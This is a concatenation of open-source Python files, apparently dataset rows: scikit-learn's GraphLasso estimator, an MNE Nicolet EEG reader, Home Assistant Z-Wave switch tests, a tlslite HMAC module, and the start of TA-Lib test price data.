from ..linear_model import lars_path
from ..linear_model import cd_fast
from ..model_selection import check_cv, cross_val_score
from ..externals.joblib import Parallel, delayed
import collections
# Helper functions to compute the objective and dual objective functions
# of the l1-penalized estimator
def _objective(mle, precision_, alpha):
"""Evaluation of the graph-lasso objective function
the objective function is made of a shifted scaled version of the
normalized log-likelihood (i.e. its empirical mean over the samples) and a
penalisation term to promote sparsity
"""
p = precision_.shape[0]
cost = - 2. * log_likelihood(mle, precision_) + p * np.log(2 * np.pi)
cost += alpha * (np.abs(precision_).sum()
- np.abs(np.diag(precision_)).sum())
return cost
def _dual_gap(emp_cov, precision_, alpha):
"""Expression of the dual gap convergence criterion
The specific definition is given in Duchi "Projected Subgradient Methods
for Learning Sparse Gaussians".
"""
gap = np.sum(emp_cov * precision_)
gap -= precision_.shape[0]
gap += alpha * (np.abs(precision_).sum()
- np.abs(np.diag(precision_)).sum())
return gap
def alpha_max(emp_cov):
"""Find the maximum alpha for which there are some non-zeros off-diagonal.
Parameters
----------
emp_cov : 2D array, (n_features, n_features)
The sample covariance matrix
Notes
-----
This results from the bound for the all the Lasso that are solved
in GraphLasso: each time, the row of cov corresponds to Xy. As the
bound for alpha is given by `max(abs(Xy))`, the result follows.
"""
A = np.copy(emp_cov)
A.flat[::A.shape[0] + 1] = 0
return np.max(np.abs(A))
# The g-lasso algorithm
def graph_lasso(emp_cov, alpha, cov_init=None, mode='cd', tol=1e-4,
enet_tol=1e-4, max_iter=100, verbose=False,
return_costs=False, eps=np.finfo(np.float64).eps,
return_n_iter=False):
"""l1-penalized covariance estimator
Read more in the :ref:`User Guide <sparse_inverse_covariance>`.
Parameters
----------
emp_cov : 2D ndarray, shape (n_features, n_features)
Empirical covariance from which to compute the covariance estimate.
alpha : positive float
The regularization parameter: the higher alpha, the more
regularization, the sparser the inverse covariance.
cov_init : 2D array (n_features, n_features), optional
The initial guess for the covariance.
mode : {'cd', 'lars'}
The Lasso solver to use: coordinate descent or LARS. Use LARS for
very sparse underlying graphs, where p > n. Elsewhere prefer cd
which is more numerically stable.
tol : positive float, optional
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped.
enet_tol : positive float, optional
The tolerance for the elastic net solver used to calculate the descent
direction. This parameter controls the accuracy of the search direction
for a given column update, not of the overall parameter estimate. Only
used for mode='cd'.
max_iter : integer, optional
The maximum number of iterations.
verbose : boolean, optional
If verbose is True, the objective function and dual gap are
printed at each iteration.
return_costs : boolean, optional
If return_costs is True, the objective function and dual gap
at each iteration are returned.
eps : float, optional
The machine-precision regularization in the computation of the
Cholesky diagonal factors. Increase this for very ill-conditioned
systems.
return_n_iter : bool, optional
Whether or not to return the number of iterations.
Returns
-------
covariance : 2D ndarray, shape (n_features, n_features)
The estimated covariance matrix.
precision : 2D ndarray, shape (n_features, n_features)
The estimated (sparse) precision matrix.
costs : list of (objective, dual_gap) pairs
The list of values of the objective function and the dual gap at
each iteration. Returned only if return_costs is True.
n_iter : int
Number of iterations. Returned only if `return_n_iter` is set to True.
See Also
--------
GraphLasso, GraphLassoCV
Notes
-----
The algorithm employed to solve this problem is the GLasso algorithm,
from the Friedman 2008 Biostatistics paper. It is the same algorithm
as in the R `glasso` package.
One possible difference with the `glasso` R package is that the
diagonal coefficients are not penalized.
"""
_, n_features = emp_cov.shape
if alpha == 0:
if return_costs:
precision_ = linalg.inv(emp_cov)
cost = - 2. * log_likelihood(emp_cov, precision_)
cost += n_features * np.log(2 * np.pi)
d_gap = np.sum(emp_cov * precision_) - n_features
if return_n_iter:
return emp_cov, precision_, (cost, d_gap), 0
else:
return emp_cov, precision_, (cost, d_gap)
else:
if return_n_iter:
return emp_cov, linalg.inv(emp_cov), 0
else:
return emp_cov, linalg.inv(emp_cov)
if cov_init is None:
covariance_ = emp_cov.copy()
else:
covariance_ = cov_init.copy()
# As a trivial regularization (Tikhonov like), we scale down the
# off-diagonal coefficients of our starting point: This is needed, as
# in the cross-validation the cov_init can easily be
# ill-conditioned, and the CV loop blows. Beside, this takes
# conservative stand-point on the initial conditions, and it tends to
# make the convergence go faster.
covariance_ *= 0.95
diagonal = emp_cov.flat[::n_features + 1]
covariance_.flat[::n_features + 1] = diagonal
precision_ = pinvh(covariance_)
indices = np.arange(n_features)
costs = list()
# The different l1 regression solver have different numerical errors
if mode == 'cd':
errors = dict(over='raise', invalid='ignore')
else:
errors = dict(invalid='raise')
try:
# be robust to the max_iter=0 edge case, see:
# https://github.com/scikit-learn/scikit-learn/issues/4134
d_gap = np.inf
for i in range(max_iter):
for idx in range(n_features):
sub_covariance = np.ascontiguousarray(
covariance_[indices != idx].T[indices != idx])
row = emp_cov[idx, indices != idx]
with np.errstate(**errors):
if mode == 'cd':
# Use coordinate descent
coefs = -(precision_[indices != idx, idx]
/ (precision_[idx, idx] + 1000 * eps))
coefs, _, _, _ = cd_fast.enet_coordinate_descent_gram(
coefs, alpha, 0, sub_covariance, row, row,
max_iter, enet_tol, check_random_state(None), False)
else:
# Use LARS
_, _, coefs = lars_path(
sub_covariance, row, Xy=row, Gram=sub_covariance,
alpha_min=alpha / (n_features - 1), copy_Gram=True,
method='lars', return_path=False)
# Update the precision matrix
precision_[idx, idx] = (
1. / (covariance_[idx, idx]
- np.dot(covariance_[indices != idx, idx], coefs)))
precision_[indices != idx, idx] = (- precision_[idx, idx]
* coefs)
precision_[idx, indices != idx] = (- precision_[idx, idx]
* coefs)
coefs = np.dot(sub_covariance, coefs)
covariance_[idx, indices != idx] = coefs
covariance_[indices != idx, idx] = coefs
d_gap = _dual_gap(emp_cov, precision_, alpha)
cost = _objective(emp_cov, precision_, alpha)
if verbose:
print(
'[graph_lasso] Iteration % 3i, cost % 3.2e, dual gap %.3e'
% (i, cost, d_gap))
if return_costs:
costs.append((cost, d_gap))
if np.abs(d_gap) < tol:
break
if not np.isfinite(cost) and i > 0:
raise FloatingPointError('Non SPD result: the system is '
'too ill-conditioned for this solver')
else:
warnings.warn('graph_lasso: did not converge after %i iteration:'
' dual gap: %.3e' % (max_iter, d_gap),
ConvergenceWarning)
except FloatingPointError as e:
e.args = (e.args[0]
+ '. The system is too ill-conditioned for this solver',)
raise e
if return_costs:
if return_n_iter:
return covariance_, precision_, costs, i + 1
else:
return covariance_, precision_, costs
else:
if return_n_iter:
return covariance_, precision_, i + 1
else:
return covariance_, precision_
class GraphLasso(EmpiricalCovariance):
"""Sparse inverse covariance estimation with an l1-penalized estimator.
Read more in the :ref:`User Guide <sparse_inverse_covariance>`.
Parameters
----------
alpha : positive float, default 0.01
The regularization parameter: the higher alpha, the more
regularization, the sparser the inverse covariance.
mode : {'cd', 'lars'}, default 'cd'
The Lasso solver to use: coordinate descent or LARS. Use LARS for
very sparse underlying graphs, where p > n. Elsewhere prefer cd
which is more numerically stable.
tol : positive float, default 1e-4
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped.
enet_tol : positive float, optional
The tolerance for the elastic net solver used to calculate the descent
direction. This parameter controls the accuracy of the search direction
for a given column update, not of the overall parameter estimate. Only
used for mode='cd'.
max_iter : integer, default 100
The maximum number of iterations.
verbose : boolean, default False
If verbose is True, the objective function and dual gap are
plotted at each iteration.
assume_centered : boolean, default False
If True, data are not centered before computation.
Useful when working with data whose mean is almost, but not exactly
zero.
If False, data are centered before computation.
Attributes
----------
covariance_ : array-like, shape (n_features, n_features)
Estimated covariance matrix
precision_ : array-like, shape (n_features, n_features)
Estimated pseudo inverse matrix.
n_iter_ : int
Number of iterations run.
See Also
--------
graph_lasso, GraphLassoCV
"""
def __init__(self, alpha=.01, mode='cd', tol=1e-4, enet_tol=1e-4,
max_iter=100, verbose=False, assume_centered=False):
self.alpha = alpha
self.mode = mode
self.tol = tol
self.enet_tol = enet_tol
self.max_iter = max_iter
self.verbose = verbose
self.assume_centered = assume_centered
# The base class needs this for the score method
self.store_precision = True
def fit(self, X, y=None):
# Covariance does not make sense for a single feature
X = check_array(X, ensure_min_features=2, ensure_min_samples=2,
estimator=self)
if self.assume_centered:
self.location_ = np.zeros(X.shape[1])
else:
self.location_ = X.mean(0)
emp_cov = empirical_covariance(
X, assume_centered=self.assume_centered)
self.covariance_, self.precision_, self.n_iter_ = graph_lasso(
emp_cov, alpha=self.alpha, mode=self.mode, tol=self.tol,
enet_tol=self.enet_tol, max_iter=self.max_iter,
verbose=self.verbose, return_n_iter=True)
return self
# Cross-validation with GraphLasso
def graph_lasso_path(X, alphas, cov_init=None, X_test=None, mode='cd',
tol=1e-4, enet_tol=1e-4, max_iter=100, verbose=False):
"""l1-penalized covariance estimator along a path of decreasing alphas
Read more in the :ref:`User Guide <sparse_inverse_covariance>`.
Parameters
----------
X : 2D ndarray, shape (n_samples, n_features)
Data from which to compute the covariance estimate.
alphas : list of positive floats
The list of regularization parameters, decreasing order.
X_test : 2D array, shape (n_test_samples, n_features), optional
Optional test matrix to measure generalisation error.
mode : {'cd', 'lars'}
The Lasso solver to use: coordinate descent or LARS. Use LARS for
very sparse underlying graphs, where p > n. Elsewhere prefer cd
which is more numerically stable.
tol : positive float, optional
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped.
enet_tol : positive float, optional
The tolerance for the elastic net solver used to calculate the descent
direction. This parameter controls the accuracy of the search direction
for a given column update, not of the overall parameter estimate. Only
used for mode='cd'.
max_iter : integer, optional
The maximum number of iterations.
verbose : integer, optional
The higher the verbosity flag, the more information is printed
during the fitting.
Returns
-------
covariances_ : List of 2D ndarray, shape (n_features, n_features)
The estimated covariance matrices.
precisions_ : List of 2D ndarray, shape (n_features, n_features)
The estimated (sparse) precision matrices.
scores_ : List of float
The generalisation error (log-likelihood) on the test data.
Returned only if test data is passed.
"""
inner_verbose = max(0, verbose - 1)
emp_cov = empirical_covariance(X)
if cov_init is None:
covariance_ = emp_cov.copy()
else:
covariance_ = cov_init
covariances_ = list()
precisions_ = list()
scores_ = list()
if X_test is not None:
test_emp_cov = empirical_covariance(X_test)
for alpha in alphas:
try:
# Capture the errors, and move on
covariance_, precision_ = graph_lasso(
emp_cov, alpha=alpha, cov_init=covariance_, mode=mode, tol=tol,
enet_tol=enet_tol, max_iter=max_iter, verbose=inner_verbose)
covariances_.append(covariance_)
precisions_.append(precision_)
if X_test is not None:
this_score = log_likelihood(test_emp_cov, precision_)
except FloatingPointError:
this_score = -np.inf
covariances_.append(np.nan)
precisions_.append(np.nan)
if X_test is not None:
if not np.isfinite(this_score):
this_score = -np.inf
scores_.append(this_score)
if verbose == 1:
sys.stderr.write('.')
elif verbose > 1:
if X_test is not None:
print('[graph_lasso_path] alpha: %.2e, score: %.2e'
% (alpha, this_score))
else:
print('[graph_lasso_path] alpha: %.2e' % alpha)
if X_test is not None:
return covariances_, precisions_, scores_
return covariances_, precisions_
class GraphLassoCV(GraphLasso):
"""Sparse inverse covariance w/ cross-validated choice of the l1 penalty
Read more in the :ref:`User Guide <sparse_inverse_covariance>`.
Parameters
----------
alphas : integer, or list positive float, optional
If an integer is given, it fixes the number of points on the
grids of alpha to be used. If a list is given, it gives the
grid to be used. See the notes in the class docstring for
more details.
n_refinements: strictly positive integer
The number of times the grid is refined. Not used if explicit
values of alphas are passed.
cv : int, cross-validation generator or an iterable, optional
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- An object to be used as a cross-validation generator.
- An iterable yielding train/test splits.
For integer/None inputs :class:`KFold` is used.
Refer :ref:`User Guide <cross_validation>` for the various
cross-validation strategies that can be used here.
tol: positive float, optional
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped.
enet_tol : positive float, optional
The tolerance for the elastic net solver used to calculate the descent
direction. This parameter controls the accuracy of the search direction
for a given column update, not of the overall parameter estimate. Only
used for mode='cd'.
max_iter: integer, optional
Maximum number of iterations.
mode: {'cd', 'lars'}
The Lasso solver to use: coordinate descent or LARS. Use LARS for
very sparse underlying graphs, where number of features is greater
than number of samples. Elsewhere prefer cd which is more numerically
stable.
n_jobs: int, optional
number of jobs to run in parallel (default 1).
verbose: boolean, optional
If verbose is True, the objective function and duality gap are
printed at each iteration.
assume_centered : Boolean
If True, data are not centered before computation.
Useful when working with data whose mean is almost, but not exactly
zero.
If False, data are centered before computation.
Attributes
----------
covariance_ : numpy.ndarray, shape (n_features, n_features)
Estimated covariance matrix.
precision_ : numpy.ndarray, shape (n_features, n_features)
Estimated precision matrix (inverse covariance).
alpha_ : float
Penalization parameter selected.
cv_alphas_ : list of float
All penalization parameters explored.
`grid_scores`: 2D numpy.ndarray (n_alphas, n_folds)
Log-likelihood score on left-out data across folds.
n_iter_ : int
Number of iterations run for the optimal alpha.
See Also
--------
graph_lasso, GraphLasso
Notes
-----
The search for the optimal penalization parameter (alpha) is done on an
iteratively refined grid: first the cross-validated scores on a grid are
computed, then a new refined grid is centered around the maximum, and so
on.
One of the challenges which is faced here is that the solvers can
fail to converge to a well-conditioned estimate. The corresponding
values of alpha then come out as missing values, but the optimum may
be close to these missing values.
"""
def __init__(self, alphas=4, n_refinements=4, cv=None, tol=1e-4,
enet_tol=1e-4, max_iter=100, mode='cd', n_jobs=1,
verbose=False, assume_centered=False):
self.alphas = alphas
self.n_refinements = n_refinements
self.mode = mode
self.tol = tol
self.enet_tol = enet_tol
self.max_iter = max_iter
self.verbose = verbose
self.cv = cv
self.n_jobs = n_jobs
self.assume_centered = assume_centered
# The base class needs this for the score method
self.store_precision = True
def fit(self, X, y=None):
"""Fits the GraphLasso covariance model to X.
Parameters
----------
X : ndarray, shape (n_samples, n_features)
Data from which to compute the covariance estimate
"""
# Covariance does not make sense for a single feature
X = check_array(X, ensure_min_features=2, estimator=self)
if self.assume_centered:
self.location_ = np.zeros(X.shape[1])
else:
self.location_ = X.mean(0)
emp_cov = empirical_covariance(
X, assume_centered=self.assume_centered)
cv = check_cv(self.cv, y, classifier=False)
# List of (alpha, scores, covs)
path = list()
n_alphas = self.alphas
inner_verbose = max(0, self.verbose - 1)
if isinstance(n_alphas, collections.Sequence):
alphas = self.alphas
n_refinements = 1
else:
n_refinements = self.n_refinements
alpha_1 = alpha_max(emp_cov)
alpha_0 = 1e-2 * alpha_1
alphas = np.logspace(np.log10(alpha_0), np.log10(alpha_1),
n_alphas)[::-1]
t0 = time.time()
for i in range(n_refinements):
with warnings.catch_warnings():
# No need to see the convergence warnings on this grid:
# they will always be points that will not converge
# during the cross-validation
warnings.simplefilter('ignore', ConvergenceWarning)
# Compute the cross-validated loss on the current grid
# NOTE: Warm-restarting graph_lasso_path has been tried, and
# this did not allow to gain anything (same execution time with
# or without).
this_path = Parallel(
n_jobs=self.n_jobs,
verbose=self.verbose
)(delayed(graph_lasso_path)(X[train], alphas=alphas,
X_test=X[test], mode=self.mode,
tol=self.tol,
enet_tol=self.enet_tol,
max_iter=int(.1 * self.max_iter),
verbose=inner_verbose)
for train, test in cv.split(X, y))
# Little danse to transform the list in what we need
covs, _, scores = zip(*this_path)
covs = zip(*covs)
scores = zip(*scores)
path.extend(zip(alphas, scores, covs))
path = sorted(path, key=operator.itemgetter(0), reverse=True)
# Find the maximum (avoid using built in 'max' function to
# have a fully-reproducible selection of the smallest alpha
# in case of equality)
best_score = -np.inf
last_finite_idx = 0
for index, (alpha, scores, _) in enumerate(path):
this_score = np.mean(scores)
if this_score >= .1 / np.finfo(np.float64).eps:
this_score = np.nan
if np.isfinite(this_score):
last_finite_idx = index
if this_score >= best_score:
best_score = this_score
best_index = index
# Refine the grid
if best_index == 0:
# We do not need to go back: we have chosen
# the highest value of alpha for which there are
# non-zero coefficients
alpha_1 = path[0][0]
alpha_0 = path[1][0]
elif (best_index == last_finite_idx
and not best_index == len(path) - 1):
# We have non-converged models on the upper bound of the
# grid, we need to refine the grid there
alpha_1 = path[best_index][0]
alpha_0 = path[best_index + 1][0]
elif best_index == len(path) - 1:
alpha_1 = path[best_index][0]
alpha_0 = 0.01 * path[best_index][0]
else:
alpha_1 = path[best_index - 1][0]
alpha_0 = path[best_index + 1][0]
if not isinstance(n_alphas, collections.Sequence):
alphas = np.logspace(np.log10(alpha_1), np.log10(alpha_0),
n_alphas + 2)
alphas = alphas[1:-1]
if self.verbose and n_refinements > 1:
print('[GraphLassoCV] Done refinement % 2i out of %i: % 3is'
% (i + 1, n_refinements, time.time() - t0))
path = list(zip(*path))
grid_scores = list(path[1])
alphas = list(path[0])
# Finally, compute the score with alpha = 0
alphas.append(0)
grid_scores.append(cross_val_score(EmpiricalCovariance(), X,
cv=cv, n_jobs=self.n_jobs,
verbose=inner_verbose))
self.grid_scores = np.array(grid_scores)
best_alpha = alphas[best_index]
self.alpha_ = best_alpha
self.cv_alphas_ = alphas
# Finally fit the model with the selected alpha
self.covariance_, self.precision_, self.n_iter_ = graph_lasso(
emp_cov, alpha=best_alpha, mode=self.mode, tol=self.tol,
enet_tol=self.enet_tol, max_iter=self.max_iter,
verbose=inner_verbose, return_n_iter=True)
return self
| bsd-3-clause |
teonlamont/mne-python | mne/io/nicolet/nicolet.py | 2 | 7703 | # Author: Jaakko Leppakangas <[email protected]>
#
# License: BSD (3-clause)
import numpy as np
from os import path
import datetime
import calendar
from ...utils import logger
from ..utils import _read_segments_file, _find_channels, _create_chs
from ..base import BaseRaw, _check_update_montage
from ..meas_info import _empty_info
from ..constants import FIFF
def read_raw_nicolet(input_fname, ch_type, montage=None, eog=(), ecg=(),
emg=(), misc=(), preload=False, verbose=None):
"""Read Nicolet data as raw object.
Note: This reader takes data files with the extension ``.data`` as an
input. The header file with the same file name stem and an extension
``.head`` is expected to be found in the same directory.
Parameters
----------
input_fname : str
Path to the data file.
ch_type : str
Channel type to designate to the data channels. Supported data types
include 'eeg', 'seeg'.
montage : str | None | instance of montage
Path or instance of montage containing electrode positions.
If None, sensor locations are (0,0,0). See the documentation of
:func:`mne.channels.read_montage` for more information.
eog : list | tuple | 'auto'
Names of channels or list of indices that should be designated
EOG channels. If 'auto', the channel names beginning with
``EOG`` are used. Defaults to empty tuple.
ecg : list or tuple | 'auto'
Names of channels or list of indices that should be designated
ECG channels. If 'auto', the channel names beginning with
``ECG`` are used. Defaults to empty tuple.
emg : list or tuple | 'auto'
Names of channels or list of indices that should be designated
EMG channels. If 'auto', the channel names beginning with
``EMG`` are used. Defaults to empty tuple.
misc : list or tuple
Names of channels or list of indices that should be designated
MISC channels. Defaults to empty tuple.
preload : bool or str (default False)
Preload data into memory for data manipulation and faster indexing.
If True, the data will be preloaded into memory (fast, requires
large amount of memory). If preload is a string, preload is the
file name of a memory-mapped file which is used to store the data
on the hard drive (slower, requires less memory).
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
raw : Instance of Raw
A Raw object containing the data.
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
return RawNicolet(input_fname, ch_type, montage=montage, eog=eog, ecg=ecg,
emg=emg, misc=misc, preload=preload, verbose=verbose)
def _get_nicolet_info(fname, ch_type, eog, ecg, emg, misc):
"""Extract info from Nicolet header files."""
fname = path.splitext(fname)[0]
header = fname + '.head'
logger.info('Reading header...')
header_info = dict()
with open(header, 'r') as fid:
for line in fid:
var, value = line.split('=')
if var == 'elec_names':
value = value[1:-2].split(',') # strip brackets
elif var == 'conversion_factor':
value = float(value)
elif var != 'start_ts':
value = int(value)
header_info[var] = value
ch_names = header_info['elec_names']
if eog == 'auto':
eog = _find_channels(ch_names, 'EOG')
if ecg == 'auto':
ecg = _find_channels(ch_names, 'ECG')
if emg == 'auto':
emg = _find_channels(ch_names, 'EMG')
date, time = header_info['start_ts'].split()
date = date.split('-')
time = time.split(':')
sec, msec = time[2].split('.')
date = datetime.datetime(int(date[0]), int(date[1]), int(date[2]),
int(time[0]), int(time[1]), int(sec), int(msec))
info = _empty_info(header_info['sample_freq'])
info['meas_date'] = calendar.timegm(date.utctimetuple())
if ch_type == 'eeg':
ch_coil = FIFF.FIFFV_COIL_EEG
ch_kind = FIFF.FIFFV_EEG_CH
elif ch_type == 'seeg':
ch_coil = FIFF.FIFFV_COIL_EEG
ch_kind = FIFF.FIFFV_SEEG_CH
else:
raise TypeError("Channel type not recognized. Available types are "
"'eeg' and 'seeg'.")
cals = np.repeat(header_info['conversion_factor'] * 1e-6, len(ch_names))
info['chs'] = _create_chs(ch_names, cals, ch_coil, ch_kind, eog, ecg, emg,
misc)
info['highpass'] = 0.
info['lowpass'] = info['sfreq'] / 2.0
info._update_redundant()
return info, header_info
class RawNicolet(BaseRaw):
"""Raw object from Nicolet file.
Parameters
----------
input_fname : str
Path to the Nicolet file.
ch_type : str
Channel type to designate to the data channels. Supported data types
include 'eeg', 'seeg'.
montage : str | None | instance of Montage
Path or instance of montage containing electrode positions.
If None, sensor locations are (0,0,0). See the documentation of
:func:`mne.channels.read_montage` for more information.
eog : list | tuple | 'auto'
Names of channels or list of indices that should be designated
EOG channels. If 'auto', the channel names beginning with
``EOG`` are used. Defaults to empty tuple.
ecg : list or tuple | 'auto'
Names of channels or list of indices that should be designated
ECG channels. If 'auto', the channel names beginning with
``ECG`` are used. Defaults to empty tuple.
emg : list or tuple | 'auto'
Names of channels or list of indices that should be designated
EMG channels. If 'auto', the channel names beginning with
``EMG`` are used. Defaults to empty tuple.
misc : list or tuple
Names of channels or list of indices that should be designated
MISC channels. Defaults to empty tuple.
preload : bool or str (default False)
Preload data into memory for data manipulation and faster indexing.
If True, the data will be preloaded into memory (fast, requires
large amount of memory). If preload is a string, preload is the
file name of a memory-mapped file which is used to store the data
on the hard drive (slower, requires less memory).
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
def __init__(self, input_fname, ch_type, montage=None, eog=(), ecg=(),
emg=(), misc=(), preload=False, verbose=None): # noqa: D102
input_fname = path.abspath(input_fname)
info, header_info = _get_nicolet_info(input_fname, ch_type, eog, ecg,
emg, misc)
last_samps = [header_info['num_samples'] - 1]
_check_update_montage(info, montage)
super(RawNicolet, self).__init__(
info, preload, filenames=[input_fname], raw_extras=[header_info],
last_samps=last_samps, orig_format='int',
verbose=verbose)
def _read_segment_file(self, data, idx, fi, start, stop, cals, mult):
"""Read a chunk of raw data."""
_read_segments_file(self, data, idx, fi, start, stop, cals, mult)
| bsd-3-clause |
w1ll1am23/home-assistant | tests/components/zwave/test_switch.py | 11 | 2347 | """Test Z-Wave switches."""
from unittest.mock import patch
from homeassistant.components.zwave import switch
from tests.mock.zwave import MockEntityValues, MockNode, MockValue, value_changed
def test_get_device_detects_switch(mock_openzwave):
"""Test get_device returns a Z-Wave switch."""
node = MockNode()
value = MockValue(data=0, node=node)
values = MockEntityValues(primary=value)
device = switch.get_device(node=node, values=values, node_config={})
assert isinstance(device, switch.ZwaveSwitch)
def test_switch_turn_on_and_off(mock_openzwave):
"""Test turning on a Z-Wave switch."""
node = MockNode()
value = MockValue(data=0, node=node)
values = MockEntityValues(primary=value)
device = switch.get_device(node=node, values=values, node_config={})
device.turn_on()
assert node.set_switch.called
value_id, state = node.set_switch.mock_calls[0][1]
assert value_id == value.value_id
assert state is True
node.reset_mock()
device.turn_off()
assert node.set_switch.called
value_id, state = node.set_switch.mock_calls[0][1]
assert value_id == value.value_id
assert state is False
def test_switch_value_changed(mock_openzwave):
"""Test value changed for Z-Wave switch."""
node = MockNode()
value = MockValue(data=False, node=node)
values = MockEntityValues(primary=value)
device = switch.get_device(node=node, values=values, node_config={})
assert not device.is_on
value.data = True
value_changed(value)
assert device.is_on
@patch("time.perf_counter")
def test_switch_refresh_on_update(mock_counter, mock_openzwave):
"""Test value changed for refresh on update Z-Wave switch."""
mock_counter.return_value = 10
node = MockNode(manufacturer_id="013c", product_type="0001", product_id="0005")
value = MockValue(data=False, node=node, instance=1)
values = MockEntityValues(primary=value)
device = switch.get_device(node=node, values=values, node_config={})
assert not device.is_on
mock_counter.return_value = 15
value.data = True
value_changed(value)
assert device.is_on
assert not node.request_state.called
mock_counter.return_value = 45
value.data = False
value_changed(value)
assert not device.is_on
assert node.request_state.called
| apache-2.0 |
kuri65536/python-for-android | python-build/python-libs/gdata/build/lib/gdata/tlslite/utils/hmac.py | 403 | 3286 | """HMAC (Keyed-Hashing for Message Authentication) Python module.
Implements the HMAC algorithm as described by RFC 2104.
(This file is modified from the standard library version to do faster
copying)
"""
def _strxor(s1, s2):
"""Utility method. XOR the two strings s1 and s2 (must have same length).
"""
return "".join(map(lambda x, y: chr(ord(x) ^ ord(y)), s1, s2))
# The size of the digests returned by HMAC depends on the underlying
# hashing module used.
digest_size = None
class HMAC:
"""RFC2104 HMAC class.
This supports the API for Cryptographic Hash Functions (PEP 247).
"""
def __init__(self, key, msg = None, digestmod = None):
"""Create a new HMAC object.
key: key for the keyed hash object.
msg: Initial input for the hash, if provided.
digestmod: A module supporting PEP 247. Defaults to the md5 module.
"""
if digestmod is None:
import md5
digestmod = md5
if key == None: #TREVNEW - for faster copying
return #TREVNEW
self.digestmod = digestmod
self.outer = digestmod.new()
self.inner = digestmod.new()
self.digest_size = digestmod.digest_size
blocksize = 64
ipad = "\x36" * blocksize
opad = "\x5C" * blocksize
if len(key) > blocksize:
key = digestmod.new(key).digest()
key = key + chr(0) * (blocksize - len(key))
self.outer.update(_strxor(key, opad))
self.inner.update(_strxor(key, ipad))
if msg is not None:
self.update(msg)
## def clear(self):
## raise NotImplementedError, "clear() method not available in HMAC."
def update(self, msg):
"""Update this hashing object with the string msg.
"""
self.inner.update(msg)
def copy(self):
"""Return a separate copy of this hashing object.
An update to this copy won't affect the original object.
"""
other = HMAC(None) #TREVNEW - for faster copying
other.digest_size = self.digest_size #TREVNEW
other.digestmod = self.digestmod
other.inner = self.inner.copy()
other.outer = self.outer.copy()
return other
def digest(self):
"""Return the hash value of this hashing object.
This returns a string containing 8-bit data. The object is
not altered in any way by this function; you can continue
updating the object after calling this function.
"""
h = self.outer.copy()
h.update(self.inner.digest())
return h.digest()
def hexdigest(self):
"""Like digest(), but returns a string of hexadecimal digits instead.
"""
return "".join([hex(ord(x))[2:].zfill(2)
for x in tuple(self.digest())])
def new(key, msg = None, digestmod = None):
"""Create a new hashing object and return it.
key: The starting key for the hash.
msg: if available, will immediately be hashed into the object's starting
state.
You can now feed arbitrary strings into the object using its update()
method, and can ask for the hash value at any time by calling its digest()
method.
"""
return HMAC(key, msg, digestmod)
| apache-2.0 |
quantopian/ta-lib | talib/test_data.py | 5 | 16297 |
from __future__ import print_function
import numpy as np
from nose.tools import assert_equal, assert_not_equal, assert_true
ford_2012_dates = np.asarray([ 20120103, 20120104, 20120105, 20120106, 20120109,
20120110, 20120111, 20120112, 20120113, 20120117, 20120118, 20120119,
20120120, 20120123, 20120124, 20120125, 20120126, 20120127, 20120130,
20120131, 20120201, 20120202, 20120203, 20120206, 20120207, 20120208,
20120209, 20120210, 20120213, 20120214, 20120215, 20120216, 20120217,
20120221, 20120222, 20120223, 20120224, 20120227, 20120228, 20120229,
20120301, 20120302, 20120305, 20120306, 20120307, 20120308, 20120309,
20120312, 20120313, 20120314, 20120315, 20120316, 20120319, 20120320,
20120321, 20120322, 20120323, 20120326, 20120327, 20120328, 20120329,
20120330, 20120402, 20120403, 20120404, 20120405, 20120409, 20120410,
20120411, 20120412, 20120413, 20120416, 20120417, 20120418, 20120419,
20120420, 20120423, 20120424, 20120425, 20120426, 20120427, 20120430,
20120501, 20120502, 20120503, 20120504, 20120507, 20120508, 20120509,
20120510, 20120511, 20120514, 20120515, 20120516, 20120517, 20120518,
20120521, 20120522, 20120523, 20120524, 20120525, 20120529, 20120530,
20120531, 20120601, 20120604, 20120605, 20120606, 20120607, 20120608,
20120611, 20120612, 20120613, 20120614, 20120615, 20120618, 20120619,
20120620, 20120621, 20120622, 20120625, 20120626, 20120627, 20120628,
20120629, 20120702, 20120703, 20120705, 20120706, 20120709, 20120710,
20120711, 20120712, 20120713, 20120716, 20120717, 20120718, 20120719,
20120720, 20120723, 20120724, 20120725, 20120726, 20120727, 20120730,
20120731, 20120801, 20120802, 20120803, 20120806, 20120807, 20120808,
20120809, 20120810, 20120813, 20120814, 20120815, 20120816, 20120817,
20120820, 20120821, 20120822, 20120823, 20120824, 20120827, 20120828,
20120829, 20120830, 20120831, 20120904, 20120905, 20120906, 20120907,
20120910, 20120911, 20120912, 20120913, 20120914, 20120917, 20120918,
20120919, 20120920, 20120921, 20120924, 20120925, 20120926, 20120927,
20120928, 20121001, 20121002, 20121003, 20121004, 20121005, 20121008,
20121009, 20121010, 20121011, 20121012, 20121015, 20121016, 20121017,
20121018, 20121019, 20121022, 20121023, 20121024, 20121025, 20121026,
20121031, 20121101, 20121102, 20121105, 20121106, 20121107, 20121108,
20121109, 20121112, 20121113, 20121114, 20121115, 20121116, 20121119,
20121120, 20121121, 20121123, 20121126, 20121127, 20121128, 20121129,
20121130, 20121203, 20121204, 20121205, 20121206, 20121207, 20121210,
20121211, 20121212, 20121213, 20121214, 20121217, 20121218, 20121219,
20121220, 20121221, 20121224, 20121226, 20121227, 20121228, 20121231 ])
ford_2012 = {
'open': np.asarray([ 11.00, 11.15, 11.33, 11.74, 11.83, 12.00, 11.74, 12.16,
12.01, 12.20, 12.03, 12.48, 12.55, 12.69, 12.56, 12.80, 13.03, 11.96,
12.06, 12.47, 12.73, 12.40, 12.47, 12.85, 12.93, 12.91, 12.89, 12.52,
12.74, 12.46, 12.47, 12.38, 12.84, 12.74, 12.49, 12.27, 12.43, 12.11,
12.34, 12.28, 12.48, 12.74, 12.67, 12.23, 12.21, 12.41, 12.53, 12.57,
12.48, 12.64, 12.90, 12.86, 12.52, 12.48, 12.59, 12.48, 12.31, 12.45,
